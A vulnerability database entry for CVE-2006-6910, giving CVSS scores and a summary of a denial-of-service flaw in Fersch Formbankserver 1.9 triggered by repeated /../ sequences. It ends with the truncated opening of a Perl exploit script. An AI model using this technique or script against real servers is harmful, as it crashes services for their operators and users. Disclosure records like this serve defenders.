7.8
CVSSv2

CVE-2006-6910

Published: 31/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

formbankcgi.exe in Fersch Formbankserver 1.9, when the PATH_INFO begins with Abfrage, allows remote malicious users to cause a denial of service (daemon crash) via multiple requests containing many /../ sequences in the Name parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

fersch formbankserver 1.9

Exploits

#!perl #Vulnerability found by Bl0od3r #visit dc3dlam to see more exploits #wwwferschde/formbankserver/ #download:wwwdownload-tippde/cgi-bin/jumpcgi?ID=8796 - Hide quoted text - use IO::Socket; use warnings; package exploit; sub new { bless {} } sub bar { my $self = shift; $self->{host}=$ARGV[0]; $self-&gt ...